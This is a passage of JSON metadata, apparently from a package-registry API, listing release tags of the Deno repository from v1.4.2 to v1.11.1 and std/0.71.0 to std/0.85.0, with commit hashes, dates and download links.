a0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/